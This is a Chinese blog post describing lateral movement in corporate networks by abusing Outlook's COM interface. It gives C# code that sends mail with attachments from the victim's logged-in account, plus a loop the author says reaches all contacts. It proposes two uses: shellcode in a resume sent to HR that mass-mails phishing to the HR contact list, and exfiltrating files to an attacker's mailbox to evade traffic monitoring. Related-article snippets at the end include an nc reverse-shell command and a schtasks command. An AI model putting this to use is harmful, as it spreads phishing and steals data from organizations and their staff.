企业内网渗透横向攻击的一种思路

最新推荐文章于 2024-07-02 09:58:58 发布
最新推荐文章于 2024-07-02 09:58:58 发布
阅读量2.2k 收藏 2
点赞数 1
分类专栏: 心情杂货铺 文章标签: Outlook发送邮件 横向渗透 企业内网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/98951507
版权

以前老东家有个员工不小心点开了Emotet木马,不久后,全体员工收到了一封带有病毒附件的钓鱼邮件,发件人账号正式该员工的邮件账户。

最近在看Black Hat USA 2019大会 第一天的PPT,其中一篇主题《us-19-Joly-Hunting-For-Bugs-Catching-Dragons.pdf》

里面介绍了使用C#调用Outlook的COM库,并以当前登陆邮件账户,给指定邮箱发送邮件。

首先使用vs2013创建一个c# 控制台程序,然后添加引用outlook提供的com对象。

具体操作参考微软官方文档:https://support.microsoft.com/en-hk/help/310258/how-to-use-the-microsoft-outlook-object-library-to-retrieve-a-message

Program.cs代码:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Reflection;
using Outlook = Microsoft.Office.Interop.Outlook;
using Microsoft.Office.Interop.Outlook;
namespace HBDemo
{
    class Program
    {
        static void Main(string[] args)
        {
            var objOutlook = new Outlook.Application();
            var accounts = objOutlook.Session.Accounts;
            MailItem mic = (MailItem)(objOutlook.CreateItem(OlItemType.olMailItem));
            mic.RTFBody = System.IO.File.ReadAllBytes(@"d:\test.rtf");
            mic.Subject = "Important Email";
            mic.Importance = OlImportance.olImportanceHigh;
            mic.Attachments.Add(@"d:\test2.docx", OlAttachmentType.olOLE);
            mic.MessageClass = "IPM.Document.Outlook.File.msg.15";
            mic.To = "xxx@qq.com";
            mic.Send();
        }
    }
}

以上代码运行后,会给指定的xxx@qq.com邮箱发送一封带附件的邮件。

使用以下代码,可以给当前outlook账户下所有联系人发送邮件

   // 给Outlook账户下所有联系人发送邮件
         foreach(Account ac in accounts)
        {
             mic.SendUsingAccount = ac;
        }

利用思路有两种:

1) 给HR发送一封简历附件,打开后自动执行shellcode,调用outlook的com对象,借用hr的邮箱账户给hr的所有联系人群发一封诱惑性标题的钓鱼邮件。

2) 回传数据,发送邮件时可以指定一个附件路径。 目标执行我们的程序后,可以把特定文件通过outlook邮件的方法传到黑客指定的接收邮箱,可以避免一些流量监控软件。

参考资料:
https://docs.microsoft.com/en-us/office/vba/api/outlook.mailitem.sendusingaccount
https://docs.microsoft.com/en-us/dotnet/api/microsoft.office.interop.outlook.mailitem

Blackhat USA 2019第一天PPT汇总:
链接:https://pan.baidu.com/s/1mX2Y0x5wQLjvBA9W0_4iTA
提取码:bcg5

FFE4
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
EW内渗透
05-06
"EW内渗透"可能是指一种内渗透工具或者一套方法论,用于模拟黑客攻击行为,检测并增强络防御能力。 1. **内渗透测试**:内渗透测试是对企业内部络进行的安全评估,目的是发现潜在的安全漏洞,包括未经...
#资源分享达人# 红蓝对抗之Windows内渗透.zip
08-03
渗透测试是一种模拟黑客攻击行为,对内部络系统进行安全评估的方法。它旨在发现并修复组织内部络中的安全漏洞,防止真实攻击者利用这些漏洞进行非法活动。红蓝对抗则是内渗透测试的一种实战演练形式,其中...
导入outlook数据文件_将文档导入Outlook
cunchi8090的博客
07-18 745
导入outlook数据文件 I met Paul Devereux (@pdevereux) today when I responded to his tweet asking “Anybody know how to automate adding files from disk to a folder in #outlook ?”. I repli...
[内] 横向渗透的几种方式
weixin_43586169的博客
07-28 4833
详细介绍了,横向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
渗透测试:内横向移动基础总结
从事厨房信息化行业,万能对接所有点餐系统,kds,智能控菜,酒店协调软件
06-12 157
Windows 7为跳板机用户名:douser密码:Dotest123Windows server 2008为域控(主机名:WIN-ENS2VR5TR3N)用户名:administrator密码:Liu78963攻击者已经获得了Windows7的权限,想要以Windows7作为跳板机进一步渗透的Windows server 2008,并且攻击者已经在跳板机上面通过socks代理等技术使自己可以访问到内的Windows server 2008。
络战争升级:横向渗透vs纵向渗透,谁才是真正的黑客大师
vivlol918的博客
09-27 1069
通过组织安全意识教育、络分段、权限管理、安全审计、数据加密和监视等措施,可以有效防护纵向渗透攻击。然而,安全是一个持续的过程,需要不断更新和改进防护措施以应对不断变化的威胁。
DAY39:横向渗透
qq_49433473的博客
08-28 1766
哈希传递攻击概述(PTH) 、横向渗透横向移动工具合集使用及方法、Mimikatz 、Procdump+Mimikatz、psexec 、msf、CrackMapExec批量横向渗透、WMI 命令、Invoke-WmiCommand(PowerShell)
络攻防之内安全横向渗透权限提升
weixin_46626737的博客
06-30 722
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
渗透完全技巧.pdf
10-03
络安全】是保护络系统免受恶意攻击的关键领域,而【内渗透】则是络安全中的一个环节,旨在发现并修复内部络的安全漏洞。【域渗透】是针对Windows域环境进行的一种高级攻击技术,目的是控制域控制器,...
横向移动密码凭证获取总结.pdf
12-08
横向移动是渗透测试中一个关键步骤,通常发生在攻击者已经控制了内中的一台或多台设备之后。为了进一步扩大攻击范围,攻击者需要获取域内的密码凭证,包括密码哈希值,以便利用这些凭证对其他系统进行访问。...
渗透-内环境下的横向移动总结
lza20001103的博客
04-14 1358
环境下的横向移动总结
红蓝对抗下的内横向移动渗透技术详解
最新发布
lurenjia404的博客
07-02 1828
本文主要介绍了利用远程服务进行横向渗透的方法,读者阅读本章内容后就能够理解,红队人员一旦通过外部某一个点进入了企业内部络之中,那么内之中所有的安全防护设备将会形同虚设,红队人员在内之中获取核心靶标的系统权限如同探囊取物。因此,如何有效地建立内横向渗透安全防护体系就成了大部分企业及蓝队防守人员值得思考的问题,笔者希望通过本章对红队人员进行横向渗透所常利用的手法的介绍,读者能够对内安全体系建设引起更多的重视和思考。
针对一次渗透攻击的防护
Reggie的博客
03-28 850
一、 黑客攻击路径 1)通过SQL注入攻击获得页管理员账号密码 2)获取管理站权限,找到文件上传入口 3)上传获取webshell,在后台执行脚本文件 4)攻击者拿下web服务器 5)开始横向渗透 6)在内中发现高危漏洞 7)进行高危漏洞的利用 8)拿下内服务器,服务器与其他内服务器之间络互通 9)在内开始进行横向渗透 10)对内服务器或系统进行口令爆破 11)弱口令或通用口令的存在导致内服务器批量沦陷 12)核心数据库失陷 ...
003--横向渗透的常见方法
weixin_44508748的博客
07-22 2959
在已经攻占部分内主机的前提下,利用现有的资源尝试获取更多的凭据、更高的权限,进而达到控制整个段、拥有最高权限的目的。在很多时候,内渗透的起点往往只是一台通过各种漏洞漏洞攻陷的跳板,通过这个突破口去不断扩大在本段内的战果,是为横向渗透。 一、系统漏洞 0day 二、流量监听 三、ARP欺骗 四、服务密码攻击 ...
MSF多层内渗透全过程
include_voidmain的博客
08-16 2274
MSF多层内渗透全过程
横向移动攻击+模型逆推+对抗样本
weixin_46461634的博客
06-30 529
横向移动攻击(Lateral Movement Attack)是指攻击者在已经侵入目标络或系统的情况下,试图在络中移动或传播,以获取更高的权限或访问敏感信息。横向移动攻击攻击中的一种常见技术,通常是在渗透测试、黑客攻击或恶意软件传播中使用的策略之一。攻击者通过横向移动攻击利用已经被入侵的计算机系统或络上的漏洞、弱密码、恶意软件或其他安全漏洞,进一步扩大其控制范围,从一个受感染的系统跳转到另一个系统。
如何在横向渗透攻击中寻到一线生机
dexun123的博客
04-08 1234
横向渗透,作为计算机络中的一种攻击技术,展现出了攻击者如何巧妙地利用同一级别系统间的漏洞和弱点,扩大其络访问权限。与纵向渗透不同,横向渗透不关注权限的垂直提升,而是更侧重于在同一层级内扩展影响力。横向渗透可以发生在局域或广域中,攻击者通常通过利用弱点、漏洞或不安全的身份验证方法来获取访问权限。一旦入侵了一个系统,攻击者可能会尝试使用该系统的凭据或其他攻击方法,以获取对其他相邻系统的访问权限。横向渗透攻击的目标是在目标络内部扩散,在多个系统上建立持久性,并获取对关键系统和数据的控制权。
横向渗透之各种传递攻击
技术超强的网络安全平台
05-06 2206
横向渗透之各种传递攻击 前言 在前面一篇文章已经对内信息收集做了详细介绍,所需要的内环境也包含在那篇文章中,接下来将以前期内信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透横向渗透 在拿下一台内主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内、获取到最高权限、发动高级持续性威胁攻击的目的。我们掌握的方法越多,可能拿到的主机权限的机会就越大。 利用PsExec工具进行横向渗透 PsExec 最强大的功能之一是在远程系统和远程支持
渗透技术:横向移动学习笔记
"这篇内横向移动学习备忘录主要探讨了在内...内横向移动是一种复杂而危险的攻击方式,需要深入理解络协议和安全策略,以防止和对抗这类威胁。同时,对攻击技术的学习和研究也是提高络安全防护能力的重要途径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值